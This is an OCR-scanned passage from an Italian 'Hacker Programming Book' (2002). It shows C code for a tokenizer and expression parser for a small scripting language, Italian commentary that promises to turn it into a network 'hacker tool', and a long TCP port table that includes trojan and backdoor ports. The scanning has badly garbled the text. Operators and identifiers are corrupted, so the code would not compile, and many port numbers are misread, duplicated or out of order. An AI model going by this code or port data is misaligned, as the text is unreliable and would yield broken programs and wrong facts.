} 

if(is_in(*prog, "+-/%**=()")) { 
tok_type = DELIMITER; 
*temp++ = *prog++; 

} 

if(*prog == ' ! ') { 

while ( ! isdelim (*prog) ) 

*temp++ = *prog++; 
tok_type = VARIABLE; 

} 

if (isdigit (*prog) ) { 

while ( ! isdelim (*prog) ) 

*temp++ = *prog++; 
tok_type = NUMBER; 

} 

if(*prog == ': ') { 

while ( ! isdelim (*prog) ) 

*temp++ = *prog++; 
tok_type = LABEL; 

} 

if(*prog == '$') { 

while ( ! isdelim (*prog) ) 

*temp++ = *prog++; 
tok_type = COUNTER; 

} 

if (i salpha ( *prog) ) { 
searchfunction () ; 
while ( ! isdelim (*prog) ) 

*temp++ = *prog++; 
tok_type = INSTRUCTION; 

} 

*temp = ' \0 ' ; 

} 

static float find_var (char *s) 
{ 

if(!isalpha(*s)) { 
serror (1) ; 
return (float) 0.0; 

} 

return vars[*token - 'A']; 

} 

static void putback (void) 
{ 

char *t; 
t = token; 
for(;*t;t++) 
prog—; 

ì 

static void unary (char o, float *r) 
{ 

± f (o == '-') 
*r = -(*r); 

ì 

static void arith (char o, float *r, float *h) 
{ 
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float t, ex; 
switch(o) { 

case '-' : 

*r = *r - *h; 

break; 
case '+': 

*r = *r + *h; 

break; 
case '*' : 

*r = *r * *h; 

break; 
case '/': 

*r = *r / *h; 

break; 
case '%' : 

t = *r / *h; 

*r = *r - (t * *h) ; 

break; 
case 

ex = *r; 

if(*h == 0) { 

*r = (float) 1.0; 
break; 

} 

for (t=*h- (float) 1 . 0; t> (float) 0. 0; —t) 

*r = *r * ex; 
break; 

} 

) 

static void primitive (float *result) 
{ 

switch (tok_type) { 

case VARIABLE: 

*result = find_var(token); 

get_token () ; 

return; 
case NUMBER : 

*result = (float) atof (token) ; 

get_token () ; 

return; 
de fault : 

serror (0) ; 

} 

) 

static void level6 (float *result) 
{ 

if(*token == '(' SS tok_type == DEL IMI TER ) { 

get_token () ; 

levell (result) ; 

if(*token != ') ') 
serror (1) ; 

get_token () ; 
} else 

primitive (result) ; 

) 

static void level5 (float *result) 
{ 

register char op; 
op = 0; 

if(tok_type == DELIMITER SS *token == '+' // *token == '-') { 
op = * token; 
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get_token () ; 

} 

level6 (result) ; 
if(op) 

unary(op, result); 

} 

static void level4 (float *result) 
{ 

float hold; 
level5 (result) ; 
if(*token == '*') { 

get_token () ; 

level4 (&hold) ; 

arith(' A ', result, Shold) ; 

} 



static void level3 (float *result) 
{ 

register char op; 
float hold; 
level4 (result) ; 

while C (op = *token) == '*' \ \ op == '/' / / op == '%') { 
get_token () ; 
level4 (Shold) ; 
arithfop, result, &hold) ; 

} 

} 

static void level2 (float *result) 
{ 

register char op; 
float hold; 
level3 (result) ; 

while ((op = *token) == '+' Il op == '-') { 
get_token () ; 
level3 (Shold) ; 
arithfop, result, &hold) ; 

} 

} 

static void levell (float *result) 
{ 

int slot, ttok_type; 
char temp_token [80] ; 
if(tok_type == VARIABLE) { 

lstrcpy (temp_token, token) ; 

ttok_type = tok_type; 

slot = *token - 'A'; 

get_token () ; 

if(*token != '=') { 
putback () ; 

lstrcpy (token, temp_token) ; 
tok_type = ttok_type; 
} else { 

get_token () ; 

level2 (result) ; 

vars [slot] = *result; 

return; 

} 

} 

level2 (result) ; 
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} 

static void get_exp (float *result) 
{ 

get_token () ; 
if(!*token) 

return; 
levell (result) ; 

} 

void entry (HWND hDlg) 
{ 

float answer; 
register i = 0; 
while(l) { 

prog = buffer; 

if(SendMessage(GetDlgItem(hDlg, 103), EM_GETLINE , i, (LONG) 
(LPSTR) buffer) <= 0) 
break; 
get_exp (ianswer) ; 

wsprintf (buffer, "%ld\n", (long) answer); 

SetDlgltemText (hDlg, 118, buffer); 

++i; 




In alto viene gestita una tabella dei simboli che viene utilizzata dalla funzione GetToken la 
quale quando viene chiamata restituisce non solo il TOKEN ma anche il tipo del token. 

staticvoid get_token (void) 
{ 

register char *temp; 

tok_type = 0; 

temp = token; 

while (isspace (*prog) ) 

++prog; 

if(*prog == <\0<) { 
tok_type = FINISHED; 
return; 
} 

if(is_in(*prog, "+-/%**=()")) { 
tok_type = DELIMITER; 
*temp++ = *prog++; 
) 

if(*prog == ' ! ') { 
while ( ! isdelim (*prog) ) 
*temp++ = *prog++; 
tok_type = VARIABLE; 
) 

if (isdigit (*prog) ) { 
while ( ! isdelim (*prog) ) 
*temp++ = *prog++; 
tok_type = NUMBER; 
) 

if(*prog == ' :') { 
while ( ! isdelim (*prog) ) 
*temp++ = *prog++; 
tok_type = LABEL; 
) 

if(*prog == '$') { 
while ( ! isdelim (*prog) ) 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



*temp++ = *prog++; 
tok_typ& = COUNTER; 
} 

if (i salpha ( *prog) ) { 
searchfunction () ; 
while ( ! isdelim (*prog) ) 
*temp++ = *prog++; 
tok_type = INSTRUCTION; 




Come potete vedere in alto anche i tipi di TOKEN sono definiti. 



#defineERROR0 

tfdefineDELIMITERl 

#defineVARIABLE2 

#defineNUMBER3 

#defineINSTRUCTION4 

#defineLABEL5 

#defineCOUNTER6 

#defineFINISHED 7 

#defineINSTR_SEO 

#defineINSTR_INIZIOSEl 

#defineINSTR_FINESE2 

#defineINSTR_ALTRIMENTI3 

#defineINSTR_ESEGUI4 

#defineINSTR_VAIA5 

#defineINSTR_STAMPA6 



Infatti il nostro parser permette di inserire nei costrutti anche variabili del tipo : 



Le variabili numeriche ho stabilito che devono iniziare con ! 



±f(*prog == ' ! ') / 

while ( ! isdelim (*prog) ) 
*temp++ = *prog++; 




prog è il buffer dove tutto il programma viene letto e che man mano che il tokenizzatore va 

avanti a riconoscere ed ad intepretare il puntatore a questo viene 

incrementato. 

Come potete vedere se il carattere puntato ad prog e' ! allora continua a leggere il nome della 
variabile per cui al ritorno da GetToken avremo in tok_type il valore VARIABLE e in token il 
valore del token. 
Se ci fosse un costrutto del tipo : 



STAMPA !A 



chiameremmo la prima volta GetToken il quale ci restituirebbe : 



tokjype = INSTRUCTION 
token = STAMPA 



da cui capiremmo che abbiamo a che fare con un istruzione e precisamente con STAMPA. 
Il nostro diagramma logico del linguaggio ci potrebbe dire che dopo a tale costrutto potremmo 
avere una variabile, una stringa o un numero, negli altri casi ci sarebbe errore. 
Richiamiamo GetToken la quale trovando !A ci restituirebbe : 
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Dopo aver visto che si tratta di una variabile potremmo volere che questa valutazione venisse 
fatta dall'analizzatore matematico. 

Quando si chiama GetToken il puntatore del programma viene spostato all'istruzione 
successiva. 



static void putback (void) 




{ 




char *t; 




t = token; 




for(; *t;t++) 




prog—; 




ì 





putback fa in modo che il programma torni al token precedente per cui dopo aver trovato la 
variabile faciamo arretrare il programma e richiamiamo il parser matematico. 



static void get_exp ( float *result) 
{ 

get_token () ; 
if ( ! *token) 
return; 

levell (result) ; 
ì 



il quale ci darà in result il valore dell'espressione valutata. 

Ora che abbiamo visto la struttura generale del parser possiamo vedere la specializzazione 
che lo spinge a diventare uno strumento hacker. 

Come abbiamo visto a questo punto possiamo inserire qualsiasi funzione specificando la sua 
sintassi e scrivendo il codice che deve essere eseguito. 

Chiaramente le funzionalità nel nostro caso dovranno essere implementate o mediante una 
libreria socket oppure utilizzando wincap. 

A seconda della scelta fatta dovremo aggiungere anche alcune tipologie complesse che sono 
visualizzabili come strutture non come variabili numeriche o stringa normali. 
Ma ora iniziamo a creare la sintassi del linguaggio e le loro funzioni di gestione. 
Partiamo da quelle legate alla gestione dei canali di comunicazione. 
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LE PORTE USATE DA TCP & UDP 



TCP 


0 


Reserved 


TCP 


64 


Communications Integrator (CI) 


TCP 


1 


Port Service Multiplexer 


TCP 


65 


TACACS-Database Service 


TCP 


2 


Management Utility 


TCP 


66 


Oracle SQL *NET 


TCP 


3 


Compression Process 


TCP 


67 


Bootstrap Protocol Server 


TCP 


4 


Unassigned 


TCP 


68 


Bootstrap Protocol Client 


TCP 


5 


Remote Job Entry 


TCP 


69 


Trivial File Transfer 


TCP 


6 


Unassigned 


TCP 


70 


Gopher 


TCP 


7 


Kcho 


TCP 


71 


Remote Job Service 


TCP 


8 


Unassigned 


TCP 


72 


Remote Job Service 


TCP 


9 


Discard 


TCP 


73 


Remote Job Service 


TCP 


10 


Unassigned 


TCP 


74 


Remote Job Service 


TCP 


11 


Active Users 


TCP 


75 


any private dial out service 


TCP 


12 


Unassigned 


TCP 


76 


Distributed External Object 


TCP 


13 


Daytime (RFC 867) 


Store 




TCP 


14 


Unassigned 


TCP 


77 


any private RJE service 


TCP 


15 


Unassigned [was netstat] 


TCP 


78 


vettcp 


TCP 


16 


Unassigned 


TCP 


79 


Finger 


TCP 


17 


Quote of the Day 


TCP 


80 


World Wide Web HTTP 


TCP 


18 


Message Send Protocol 


TCP 


81 


H0STS2 Name Server 


TCP 


19 


Character Generator 


TCP 


82 


XFER Utility 


TCP 


20 


File Transfer [Default Data] 


TCP 


83 


MIT ML Device 


TCP 


21 


File Transfer [Control] 


TCP 


84 


Common Trace Facility 


TCP 


22 


SSH Remote Login Protocol 


TCP 


85 


MIT ML Device 


TCP 


23 


Telnet 


TCP 


86 


Micro Focus Cobol 


TCP 


24 


any private mail system 


TCP 


87 


any private terminal link 


TCP 


25 


Simple Mail Transfer 


TCP 


88 


Kerberos 


TCP 


26 


Unassigned 


TCP 


89 


SU/MIT Telnet Gateway 


TCP 


27 


NSW User System FE 


TCP 


90 


DNSIX Securit Attribute Token 


TCP 


28 


Unassigned 


Map 






TCP 


29 


MSG ICP 


TCP 


91 


MIT Dover Spooler 


TCP 


30 


Unassigned 


TCP 


92 


Network Printing Protocol 


TCP 


31 


MSG Authentication 


TCP 


93 


Device Control Protocol 


TCP 


32 


Unassigned 


TCP 


94 


Tivoli Object Dispatcher 


TCP 


33 


Display Support Protocol 


TCP 


95 


SUPDUP 


TCP 


34 


Unassigned 


TCP 


96 


DIXIE Protocol Specification 


TCP 


35 


any private printer server 


TCP 


97 


Swift Remote Virtural File 


TCP 


36 


Unassigned 


Protocol 




TCP 


37 


Time 


TCP 


98 


TAC News 


TCP 


38 


Route Access Protocol 


TCP 


99 


Metagram Relay 


TCP 


39 


Resource Location Protocol 


TCP 


100 


[unauthorized use] 


TCP 


40 


Unassigned 


TCP 


101 


NIC Host Name Server 


TCP 


41 


Graphics 


TCP 


102 


ISO-TSAP Class 0 


TCP 


42 


Host Name Server 


TCP 


103 


Genesis Point—to—Point Trans 


TCP 


43 


Whols 


Net 






TCP 


44 


MPM FLAGS Protocol 


TCP 


104 


ACR-NEMA Digital Imag. & 


TCP 


45 


Message Processing Module 


Comm. 


300 


[recv] 




TCP 


105 


Mailbox Name Nameserver 


TCP 


46 


MPM [default send] 


TCP 


106 


3C0M—TSMUX 


TCP 


47 


NI FTP 


TCP 


107 


Remote Telnet Service 


TCP 


48 


Digital Audit Daemon 


TCP 


108 


SNA Gateway Access Server 


TCP 


49 


Login Host Protocol (TACACS) 


TCP 


109 


Post Office Protocol - 


TCP 


50 


Remote Mail Checking Protocol 


Version 2 


TCP 


51 


IMP Logicai Address 


TCP 


110 


Post Office Protocol - 


Maintenance 


Version 3 


TCP 


52 


XNS Time Protocol 


TCP 


111 


SUN Remote Procedure Cali 


TCP 


53 


Domain Name Server 


TCP 


112 


McIDAS Data Transmission 


TCP 


54 


XNS Clearinghouse 


Protocol 




TCP 


55 


ISI Graphics Language 


TCP 


113 


Authentication Service 


TCP 


56 


XNS Authentication 


TCP 


114 


Audio News Multicast 


TCP 


57 


any private terminal access 


TCP 


115 


Simple File Transfer Protocol 


TCP 


58 


XNS Mail 


TCP 


116 


ANSA REX Notify 


TCP 


59 


any private file service 


TCP 


117 


UUCP Path Service 


TCP 


60 


Unassigned 


TCP 


118 


SQL Services 


TCP 


61 


NI MAIL 


TCP 


119 


Network News Transfer 


TCP 


62 


ACA Services 


Protocol 




TCP 


63 


whois++ 


TCP 


120 


CFDPTKT 
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TCP 121 Encore Expedited Remote 
Pro. Cali 

TCP 122 SMAKYNET 

TCP 123 Network Time Protocol 

TCP 124 ANSA REX Trader 

TCP 125 Locus PC-Interface Net Map 

Ser 

TCP 126 Unisys Unitary Login 

TCP 127 Locus PC-Interface Conn 
Server 

TCP 128 GSS X License Verification 

TCP 129 Password Generator Protocol 

TCP 130 cisco FNATIVE 

TCP 131 cisco TNATIVE 

TCP 132 cisco SYSMAINT 

TCP 133 Statistics Service 

TCP 134 INGRES— NET Service 

TCP 135 DCE endpoint resolution 

TCP 136 PROFILE Naming System 

TCP 137 NETBIOS Name Service 

TCP 138 NETBIOS Datagram Service 

TCP 139 NETBIOS Session Service 

TCP 140 EMFIS Data Service 

TCP 141 EMFIS Control Service 

TCP 142 Britton-Lee IDM 

TCP 143 Internet Message Access 

Protocol 

TCP 144 Universal Management 

Architecture 

TCP 145 UAAC Protocol 

TCP 146 ISO-IP 0 

TCP 147 ISO-IP 

TCP 148 Jargon 

TCP 149 AED 512 Emulation Service 

TCP 150 SQL-NET 

TCP 151 HEMS 

TCP 152 Background File Transfer 

Program 

TCP 153 SGMP 

TCP 154 NETSC 

TCP 155 NETSC 

TCP 156 SQL Service 

TCP 157 KNET/VM Command/Message 

Protocol 

TCP 158 PCMail Server 

TCP 159 NSS-Routing 

TCP 1 60 SGMP-TRAPS 

TCP 1 61 SNMP 

TCP 1 62 SNMPTRAP 

TCP 163 CMIP/TCP Manager 

TCP 164 CMIP/TCP Agent 

TCP 1 65 Xerox 

TCP 166 Sirius Systems 

TCP 1 67 NAMP 

TCP 1 68 RSVD 

TCP 1 69 SENO 

TCP 170 Network PostScript 

TCP 171 Network Innovations Multiplex 

TCP 172 Network Innovations CL/1 

TCP 1 73 Xyplex 

TCP 1 74 MAILQ 

TCP 1 75 VMNET 

TCP 176 GENRAD—MUX 

TCP 177 X Display Manager Control 

Protocol 

TCP 178 NextStep Window Server 

TCP 179 Border Gateway Protocol 

TCP 180 Intergraph 

TCP 181 Unify 

TCP 182 Unisys Audit SITP 

TCP 183 OCBinder 

TCP 184 OCServer 

TCP 185 Remote-KIS 

TCP 186 KIS Protocol 

TCP 187 Application Communication 

Interface 

TCP 188 Plus Five's MUMPS 



TCP 189 Queued File Transport 

TCP 190 Gateway Access Control 
Protocol 

TCP 191 Prospero Directory Service 

TCP 192 OSU Network Monitoring System 

TCP 193 Spider Remote Monitoring 
Protocol 

TCP 194 Internet Relay Chat Protocol 

TCP 195 DNSIX Network Level Module 
Audit 

TCP 196 DNSIX Session Mgt Module 
Audit Redir 

TCP 197 Directory Location Service 

TCP 198 Directory Location Service 

Monitor 

TCP 199 SMUX 

TCP 200 IBM System Resource 
Controller 

TCP 201 AppleTalk Routing Maintenance 

TCP 202 AppleTalk Name Binding 

TCP 203 AppleTalk Unused 

TCP 204 AppleTalk Echo 

TCP 205 AppleTalk Unused 

TCP 206 AppleTalk Zone Information 

TCP 207 AppleTalk Unused 

TCP 208 AppleTalk Unused 

TCP 209 The Quick Mail Transfer 

Protocol 

TCP 210 ANSI Z39.50 

TCP 211 Texas Instruments 914C/G 

Terminal 

TCP 212 ATEXSSTR 

TCP 213 IPX 

TCP 214 VM PWSCS 

TCP 215 Insignia Solutions 

TCP 216 Computer Associates Int '1 

License Server 

TCP 217 dBASE Unix 

TCP 218 Netix Message Posting 

Protocol 

TCP 219 Unisys ARPs 

TCP 220 Interactive Mail Access 

Protocol v3 

TCP 221 Berkeley rlogind with SPX 
auth 

TCP 222 Berkeley rshd with SPX auth 

TCP 223 Certificate Distribution 
Center 

TCP 224 masqdialer 

TCP 242 Direct 

TCP 243 Survey Measurement 

TCP 244 inbusiness 

TCP 245 LINK 

TCP 246 Display Systems Protocol 

TCP 247 SUBNTBCST_ TFTP 

TCP 248 bhfhs 

TCP 256 RAP/Checkpoint SNMP 

TCP 257 Secure Electronic Transaction 

TCP 258 Yak Winsock Personal Chat 

TCP 259 Efficient Short Remote 

Operations 

TCP 260 Openport 

TCP 261 IIOP Name Service over 

TLS/SSL 

TCP 262 Arcisdms 

TCP 263 HDAP 

TCP 264 BGMP 

TCP 265 X-Bone CTL 

TCP 266 SCSI on ST 

TCP 267 Tobit David Service Layer 

TCP 268 Tobit David Replica 

TCP 280 HTTP-mgmt 

TCP 281 Personal Link 

TCP 282 Cable Port A/X 

TCP 283 rescap 

TCP 284 corerjd 

TCP 286 FXP-1 
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TCP 


287 


K— BLOCK 


TCP 


396 


Novell Netware over IP 


TCP 


308 


Novastor Backup 


TCP 


397 


Multi Protocol Trans. Net. 


TCP 


309 


EntrustTime 


TCP 


398 


Kryptolan 


TCP 


310 


bhmds 


TCP 


399 


ISO Transport Class 2 Non- 


TCP 


311 


AppleShare IP WebAdmin 


Control over TCP 


TCP 


312 


VSLMP 


TCP 


400 


Workstation Solutions 


TCP 


313 


Magenta Logic 


TCP 


401 


Uninterruptible Power Supply 


TCP 


314 


Opalis Robot 


TCP 


402 


Genie Protocol 


TCP 


315 


DPSI 


TCP 


403 


decap 


TCP 


316 


decAuth 


TCP 


404 


nced 


TCP 


317 


Zannet 


TCP 


405 


ncld 


TCP 


318 


PKIX TimeStamp 


TCP 


406 


Interactive Mail Support 


TCP 


319 


PTP Event 


Protocol 




TCP 


320 


PTP General 


TCP 


407 


Timbuktu 


TCP 


321 


PIP 


TCP 


408 


Prospero Resource Manager 


TCP 


322 


RTSPS 


Sys. 


Man . 




TCP 


333 


Texar Security Port 


TCP 


409 


Prospero Resource Manager 


TCP 


344 


Prospero Data Access Protocol 


Node 


Man . 




TCP 


345 


Perf Analysis Workbench 


TCP 


410 


DECLadebug Remote Debug 


TCP 


346 


Zebra server 


Protocol 




TCP 


347 


Fatmen Server 


TCP 


411 


Remote MT Protocol 


TCP 


348 


Cabletron Management Protocol 


TCP 


412 


Trap Convention Port 


TCP 


349 


mftp 


TCP 


413 


SMSP 


TCP 


350 


MATIP Type A 


TCP 


414 


InfoSeek 


TCP 


351 


bhoetty (added 5/21/97) 


TCP 


415 


BNet 


TCP 


352 


bhoedap4 (added 5/21/97) 


TCP 


416 


Silverplatter 


TCP 


353 


NDSAUTH 


TCP 


417 


Onmux 


TCP 


354 


bh611 


TCP 


418 


Hyper-G 


TCP 


355 


DATEX-ASN 


TCP 


419 


Ariel 


TCP 


356 


Cloanto Net 1 


TCP 


420 


SMPTE 


TCP 


357 


bhevent 


TCP 


421 


Ariel 


TCP 


358 


Shrinkwrap 


TCP 


422 


Ariel 


TCP 


359 


Tenebris Network Trace 


TCP 


423 


IBM Operations Planning and 


Service 




Control Start 


TCP 


360 


scoi2odialog 


TCP 


424 


IBM Operations Planning and 


TCP 


361 


Semantix 


Control Track 


TCP 


362 


SRS Send 


TCP 


425 


ICAD 


TCP 


363 


RSVP Tunnel 


TCP 


426 


smart sdp 


TCP 


364 


Aurora CMGR 


TCP 


427 


Server Location 


TCP 


365 


DTK 


TCP 


428 


OCS^CMU 


TCP 


366 


ODMR 


TCP 


429 


OCS^AMU 


TCP 


367 


Mort gageWare 


TCP 


430 


UTMPSD 


TCP 


368 


QbikGDP 


TCP 


431 


UTMPCD 


TCP 


369 


rpc2portmap 


TCP 


432 


IASD 


TCP 


370 


codaauth2 


TCP 


433 


NNSP 


TCP 


371 


Clearcase 


TCP 


434 


MobilelP-Agent 


TCP 


372 


Li stProcessor 


TCP 


435 


MobilIP-MN 


TCP 


373 


Legent Corporation 


TCP 


436 


DNA-CML 


TCP 


374 


Legent Corporation 


TCP 


437 


comscm 


TCP 


375 


Hassle 


TCP 


438 


dsfgw 


TCP 


376 


Amiga Envoy Network Inquiry 


TCP 


439 


dasp 


Proto 




TCP 


440 


sgcp 


TCP 


377 


NEC Corporation 


TCP 


441 


decvms-sysmgt 


TCP 


378 


NEC Corporation 


TCP 


442 


cvc_hostd 


TCP 


379 


TIA/EIA/IS-99 modem client 


TCP 


443 


HTTP protocol over TLS/SSL 


TCP 


380 


TIA/EIA/IS-99 modem server 


TCP 


444 


Simple Network Paging 


TCP 


381 


hp performance data collector 


Protocol 




TCP 


382 


tip performance data managed 


TCP 


445 


Microsoft-DS 


node 






TCP 


446 


DDM-RDB 


TCP 


383 


hp performance data alarm 


TCP 


447 


DDM-RFM 


manager 




TCP 


448 


DDM-SSL 


TCP 


384 


A Remote Network Server 


TCP 


449 


AS Server Mapper 


System 




TCP 


450 


TServer 


TCP 


385 


IBM Application 


TCP 


451 


Cray Network Semaphore server 


TCP 


386 


ASA Message Router Object 


TCP 


452 


Cray SFS config server 


Def. 






TCP 


453 


CreativeServer 


TCP 


387 


Appletalk Update-Based 


TCP 


454 


Con tent Server 


Routing Pro. 


TCP 


455 


CreativePartnr 


TCP 


388 


Unidata LDM 


TCP 


456 


macon-tcp 


TCP 


389 


Lightweight Directory Access 


TCP 


457 


scohelp 


Protocol 




TCP 


458 


appiè quick time 


TCP 


390 


UIS 


TCP 


459 


ampr-rcmd 


TCP 


391 


SynOptics SNMP Relay Port 


TCP 


460 


skronk 


TCP 


392 


SynOptics Port Broker Port 


TCP 


461 


Da t aRampSrv 


TCP 


393 


Data Interpretation System 


TCP 


462 


DataRampSrvSec 


TCP 


394 


EMBL Nucleic Data Transfer 


TCP 


463 


alpes 


TCP 


395 


NETscout Control Protocol 


TCP 


464 


kpasswd 
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TCP 


465 


SMTPS 


TCP 


537 


Networked Media Streaming 


TCP 


466 


digltal-vrc 


Protocol 




TCP 


467 


mylex—mapd 


TCP 


538 


gdomap 


TCP 


468 


proturis 


TCP 


539 


Apertus Technologies Load 


TCP 


469 


Radio Control Protocol 


Determination 


TCP 


470 


scx-proxy 


TCP 


540 


uucpd 


TCP 


471 


Mondex 


TCP 


541 


uucp-rlogin 


TCP 


472 


ljk-login 


TCP 


542 


commerce 


TCP 


473 


hybrid-pop 


TCP 


543 


kerberos (v4/v5) 


TCP 


474 


tn-tl-wl 


TCP 


544 


krcmd 


TCP 


475 


tcpnethaspsrv 


TCP 


545 


appleqtcsrvr 


TCP 


476 


tn-tl-fdl 


TCP 


546 


DHCPv6 Client 


TCP 


477 


ss7ns 


TCP 


547 


DHCPv6 Server 


TCP 


478 


spsc 


TCP 


548 


AFP over TCP 


TCP 


479 


iaf server 


TCP 


549 


IDFP 


TCP 


480 


iafdbase 


TCP 


550 


new—who 


TCP 


481 


Ph service 


TCP 


551 


cybercash 


TCP 


482 


bgs-nsi 


TCP 


552 


deviceshare 


TCP 


483 


ulpnet 


TCP 


553 


pirp 


TCP 


484 


Integra Software Management 


TCP 


554 


Real Time Stream Control 


Envlronment 


Protocol 




TCP 


485 


Air Soft Power Burst 


TCP 


555 


phAse Zero backdoor (Win 9x, 


TCP 


486 


avian 


NT) 


/ dsf 




TCP 


487 


saft Simple Asynchronous File 


TCP 


556 


rfs server 


Transfer 




TCP 


557 


openvms—sysipc 


TCP 


488 


gss-HTTP 


TCP 


558 


SDNSKMP 


TCP 


489 


nest-protocol 


TCP 


559 


TEEDTAP 


TCP 


490 


micom—pfs 


TCP 


560 


rmonitord 


TCP 


491 


go-login 


TCP 


561 


monitor 


TCP 


492 


Transport Independent 


TCP 


562 


chcmd 


Convergence for FNA 


TCP 


563 


nntp protocol over TLS/SSL 


TCP 


493 


Transport Independent 


TCP 


564 


pian 9 file service 


Convergence for FNA 


TCP 


565 


whoami 


TCP 


494 


POV-Ray 


TCP 


566 


streettalk 


TCP 


495 


intecourier 


TCP 


567 


banyan-rpc 


TCP 


496 


PIM-RP-DISC 


TCP 


568 


microsoft shuttle 


TCP 


497 


dantz 


TCP 


569 


microsoft rome 


TCP 


498 


siam 


TCP 


570 


demon 


TCP 


499 


ISO ILL Protocol 


TCP 


571 


udemon 


TCP 


500 


isakmp 


TCP 


572 


sonar 


TCP 


501 


STMF 


TCP 


573 


banyan—vip 


TCP 


502 


asa-appl-proto 


TCP 


574 


FTP Software Agent System 


TCP 


503 


Intrinsa 


TCP 


575 


VEMMI 


TCP 


504 


citadel 


TCP 


576 


ipcd 


TCP 


505 


mailbox- lm 


TCP 


577 


vnas 


TCP 


506 


ohimsrv 


TCP 


578 


ipdd 


TCP 


507 


crs 


TCP 


579 


decbsrv 


TCP 


508 


xvttp 


TCP 


580 


SNTP HEARTBEAT 


TCP 


509 


snare 
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swismgr2 


TCP 


8032 


ProEd 


TCP 


6965 


swistrap 


TCP 


8033 


MindPrint 


TCP 


6966 


swispol 


TCP 


8080 


HTTP 


TCP 


6969 


acmsoda 


TCP 


8130 


INDIGO-VRMI 


TCP 


6998 


IATP-highPri 


TCP 


8131 


INDIGO-VBCP 


TCP 


6999 


IATP-normalPri 


TCP 


8160 


Patrol 


TCP 


1000 


file server itself 


TCP 


8161 


Patrol SNMP 


TCP 


1001 


callbacks to cache managers 


TCP 


8181 


IPSwitch IMail / Monitor 


TCP 


1002 


users & groups database 


TCP 


8200 


TRIVNET 


TCP 


1003 


volume location database 


TCP 


8201 


TRIVNET 


TCP 


1004 


AFS/Kerberos authentication 


TCP 


8204 


LM Perfworks 


service 




TCP 


8205 


LM Instmgr 


TCP 


1005 


volume managment server 


TCP 


8206 


LM Dta 


TCP 


1006 


error interpretation service 


TCP 


8201 


LM SServer 


TCP 


1001 


basic overseer process 


TCP 


8208 


LM Webwatcher 


TCP 


1008 


server-to-server updater 


TCP 


8351 


Server Find 


TCP 


1009 


remote cache manager service 


TCP 


8316 


Cruise ENUM 


TCP 


1010 


onlinet uninterruptable 


TCP 


8311 


Cruise SWROUTE 


power supplies 


TCP 


8318 


Cruise CONFIG 


TCP 


1011 


Talon Discovery Port 


TCP 


8319 


Cruise DIAGS 


TCP 


1012 


Talon Engine 


TCP 


8380 


Cruise UPDATE 


TCP 


1013 


Microtalon Discovery 


TCP 


8484 


Ipswitch IMail 


TCP 


1014 


Microtalon Communications 


TCP 


8400 


cvd 


TCP 


1015 


Talon Webserver 


TCP 


8401 


sabarsd 


TCP 


1020 


DP Serve 


TCP 


8402 


abarsd 


TCP 


1021 


DP Serve Admin 


TCP 


8403 


admind 


TCP 


1010 


ARCP 


TCP 


8431 


Micro PC-Cilin 


TCP 


1099 


lazy-ptop 


TCP 


8450 


npmp 


TCP 


1100 


X Font Service 


TCP 


8413 


Virtual Point to Point 


TCP 


1121 


Virtual Prototypes License 


TCP 


8484 


Ipswitch Web Calendar 


Manager 




TCP 


8554 


RTSP Alternate (see port 


TCP 


1141 


vnet . ibm. com 


554) 






TCP 


1161 


Catalyst 


TCP 


8133 


iBus 


TCP 


11 14 


Clutild 


TCP 


8163 


MC-APPSERVER 


TCP 


1200 


FODMS FLIP 


TCP 


8164 


OPENQUEUE 


TCP 


1201 


DLIP 


TCP 


8165 


Ultraseek HTTP 


TCP 


1323 


3.11 Remote Administration 


TCP 


8804 


truecm 


TCP 


1326 


Internet Citizen' s Band 


TCP 


8880 


CDDBP 


TCP 


1390 


The Swiss Exchange swx.ch 


TCP 


8888 


NewsEDGE server TCP (TCP 


TCP 


1395 


winqedit 


1) 






TCP 


1426 


OpenView DM Postmaster 


TCP 


8889 


Desktop Data TCP 1 


Manager 




TCP 


8890 


Desktop Data TCP 2 


TCP 


1421 


OpenView DM Event Agent 


TCP 


8891 


Desktop Data TCP 3: NESS 


Manager 




application 


TCP 


1428 


OpenView DM Log Agent 


TCP 


8892 


Desktop Data TCP 4: FARM 


Manager 




product 




TCP 


1429 


OpenView DM rqt 


TCP 


8893 


Desktop Data TCP 5: 


communication 


NewsEDGE/Web application 


TCP 


1430 


OpenView DM xmpvl api pipe 


TCP 


8894 


Desktop Data TCP 6: COAL 


TCP 


1431 


OpenView DM ovc/xmpv3 api 


application 


pipe 






TCP 


8900 


JMB-CDS 1 


TCP 


1431 


Faximum 


TCP 


8901 


JMB-CDS 2 


TCP 


1491 


telops—lmd 


TCP 


8999 


Firewall 


TCP 


1511 


pafec—lm 


TCP 


9000 


CSlistener 


TCP 


1544 


FlowAnalyzer DisplayServer 


TCP 


9001 


cisco—xremote 


TCP 


1545 


FlowAnalyzer UtilityServer 


TCP 


9090 


WebSM 


TCP 


1566 


VSI Omega 


TCP 


9100 


HP JetDirect card hp.com 


TCP 


1510 


Aries Kfinder 


TCP 


9160 


NetLOCKl 
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TCP 


9161 


NetLOCK2 


TCP 


12004 


IBM Enterprise Extender Si 


TCP 


9162 


NetLOCK3 


COS Low Priority 


TCP 


9163 


NetLOCK4 


TCP 


12172 


HiveP 


TCP 


9164 


NetLOCK5 


TCP 


12345 


Netbus (Windows Trojan) 


TCP 


9200 


WAP connectionless session 


TCP 


12346 


NetBus (Windows Trojan) 


service 




TCP 


12361 


Whack—a—mole (Windows 


TCP 


9201 


WAP session service 


Trojan) 




TCP 


9202 


WAP secure connectionless 


TCP 


12362 


Whack—a—mole (Windows 


session service 


Trojan) 




TCP 


9203 


WAP secure session service 


TCP 


12753 


tsaf port 


TCP 


9204 


WAP vCard 


TCP 


12754 


DDOS communication TCP 


TCP 


9205 


WAP vCal 


TCP 


13160 


I-ZIPQD 


TCP 


9206 


WAP vCard Secure 


TCP 


13223 


PowWow Client 


TCP 


9207 


WAP vCal Secure 


TCP 


13224 


PowWow Server 


TCP 


9321 


guibase 


TCP 


13326 


game 


TCP 


9343 


MpIdcMgr 


TCP 


13720 


BPRD Protocol (VERITAS 


TCP 


9344 


Mphlpdmc 


NetBackup) 




TCP 


9314 


fjdmimgr 


TCP 


13721 


BPBRM Protocol (VERITAS 


TCP 


9396 


fjinvmgr 


NetBackup) 




TCP 


9397 


MpIdcAgt 


TCP 


13722 


BP Java MSVC Protocol 


TCP 


9500 


ismserver 


TCP 


13782 


VERITAS NetBackup 


TCP 


9535 


Remote man server 


TCP 


13783 


VOPIED Protnocol 


TCP 


9537 


Remote man server, testing 


TCP 


13818 


DSMCC Config 


TCP 


9594 


Message System 


TCP 


13819 


DSMCC Session Messages 


TCP 


9595 


